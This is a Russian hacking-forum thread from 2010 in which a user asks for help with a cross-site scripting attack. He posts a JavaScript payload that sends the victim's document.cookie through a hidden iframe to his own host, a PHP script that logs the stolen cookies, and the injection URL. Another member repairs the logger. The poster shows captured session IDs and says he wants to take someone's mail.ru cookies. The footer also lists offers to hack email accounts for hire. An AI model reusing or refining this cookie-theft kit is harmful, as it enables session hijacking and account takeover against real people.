Нажмите CTRL-D чтобы добавить нас в закладки
HackZone.RU - Помогите с Xss
Войти / Регистрация / Участники
Определение даты выпуска iPhone по серийному номеру
-
Поиск по сайту
Форумы



Реклама

Взлом и безопасность / Новичкам RSS подписка на сообщения с форума Subscribe
Для тех, кто не знает с чего начать. Темы "Хочу стать хакером" удаляются, авторам предупреждение ибо читайте раздел "Статьи"

Новая тема Наиболее обсуждаемые темы Наиболее посещаемые темы
Поиск 
Период
Перейти

Просмотров - 4001
Помогите с Xss
Добавить этот топик в закладки »
RSS-лента ответов »Subscribe
D-512




Gold Member
# | Сообщение добавлено 22.09.2010 21:00:58
Пацаны у меня такая промблема с уводом куков!
1)Есть сайт с Xss.
2)Зарегал хост и на него залил xss.js и xss.php такого содержания
 
xss.js
Javascript
document.write('<iframe width=1 height=1 style="position: absolute; visibility: hidden;" src="'+'http://host.ru/xss.php'+'?['+location.host+']:'+document.cookie+'"></iframe>');

xss.php  
PHP
<?
$file = fopen("cookies","a");
fputs($file,"[".date("d.m.y H:i")."]".$QUERY_STRING."\r\n");
fclose($file);
?>

3)Запускаю http://sait.ru/index.php?status_report='><script src=http://host.ru/xss.js></script>;
4)Бегу смотреть файл cookie.txt а там [22.09.10 20:56] и всё!
5) Я так понял выполняется только xss.php? почему? что не так делаю? помогите плиз (с меня кнопка Спасибо) С Уважением Саня!
Сказать спасибо Ответить Цитировать

_ruzmaz_


Gold Member
# | Сообщение добавлено 24.09.2010 03:14:13
Отредактировано 24.09.2010 03:21:28 by _ruzmaz_
думаю лучше так)
PHP
<?
$file = fopen("cookies","a");
fputs($file,"[".date("d.m.y H:i")."]".$_SERVER['QUERY_STRING']."\r\n");
fclose($file);
?>
Сказать спасибо Ответить Цитировать

D-512




Gold Member
# | Сообщение добавлено 24.09.2010 22:50:26
_ruzmaz_ Правдо поомогло, но не совсем.
1)Он мне только сессию в txt записывает и с сайта на котором есть Xss.
2)Чё опять не так? (очень надо куки с майла увести)
[24.09.10 22:40][sait.ru]:PHPSESSID=69ebb0040453eb6e77c796dd893ff8a8
[24.09.10 22:42][sait.ru]:PHPSESSID=69ebb0040453eb6e77c796dd893ff8a8 (по с сылке перешёл с хак.зоны Но моих куков там нет а куки сайта с XSS)Confused
Сказать спасибо Ответить Цитировать

DuxGeneral




Member
# | Сообщение добавлено 25.09.2010 02:32:44
а как у тебя js с php взаимодествуют?
Сказать спасибо Ответить Цитировать

_ruzmaz_


Gold Member
# | Сообщение добавлено 25.09.2010 09:41:33
Отредактировано 25.09.2010 09:57:36 by _ruzmaz_
а в чем проблема? строка "PHPSESSID=69ebb0040453eb6e77c796dd893ff8a8" - это и есть все куки для сайта с xss, то есть сайта, которому принадлежит последняя открытая в данном окне браузера страница, именно их содержит свойство cookie объекта document, а не сайта, который в iframe всунули
Сказать спасибо Ответить Цитировать

D-512




Gold Member
# | Сообщение добавлено 25.09.2010 19:38:50
Отредактировано 03.11.2010 02:08:30 by D-512
_ruzmaz_

а в чем проблема?
Можно используя эту Xss с сайта, увести куки чела на @mail.ru?Confused
 
Добавлено 25.09.2010 19:40:32 (через 2 минуты 42 секунды )
 
DuxGeneral

а как у тебя js с php взаимодествуют?
код читай
Сказать спасибо Ответить Цитировать


Только зарегистрированные пользователи могут оставлять сообщения в форуме

Зарегистрироваться *** Авторизоваться

 Последние новости и статьи  Последние сообщения с форумов
  • WhatsApp уверяет пользователей, что Facebook не имеет доступа к и...
  • Однострочная команда в Windows 10 может повредить жесткий диск с ...
  • Кардерский форум Joker’s Stash объявил о закрытии
  • Релиз ядра Linux 5.9
  • Российские хакеры вооружились уязвимостью Zerologon
  • Тысячи приватных звонков американских заключенных оказались в отк...
  • Шифровальщик атаковал немецкую компанию Software AG
  • Злоумышленники используют службу Windows Error Reporting для бесф...
  • Microsoft предупредила о вымогателях, которые выдают себя за МВД ...
  • Инфостилер Valak ворует информацию из почтовых систем Microsoft E...

    Все новости... Все статьи... Прислать новость RSS
  • Взлом и безопасность / Разное » Re: Помощь в скачивании платного файла
  • Взлом и безопасность / Разное » Помощь в скачивании платного файла
  • Разное / Куплю, приму в дар » куплю | ваш аккаунта | получение нового | описание внутри
  • Разное / Предложения работы » Специалиста
  • Downloads / Другое » Re: Нужна база емайл адресов юр. лиц
  • Downloads / Другое » Нужна база емайл адресов юр. лиц
  • Разное / Предложения работы » Нужен взлом mail и gmail почты
  • Взлом и безопасность / Разное » Re: Нужна помощь в скачивании файла
  • Взлом и безопасность / Разное » Нужна помощь в скачивании файла
  • Разное / Предложения работы » требуется взлом почт на постоянной основе

    Все форумы... RSS


  • Разместить рекламу
    © HackZone Ltd. 1996-2020. Все права зарегистрированы.
    Перепечатка материалов без согласования и указания источника будет преследоваться по Закону

    О проекте | История проекта | Размещение рекламы | Обратная связь | Правила поведения на портале
    contador de visitas счетчик посещений

    #{title}

    #{text}

    x

    #{title}

    #{text}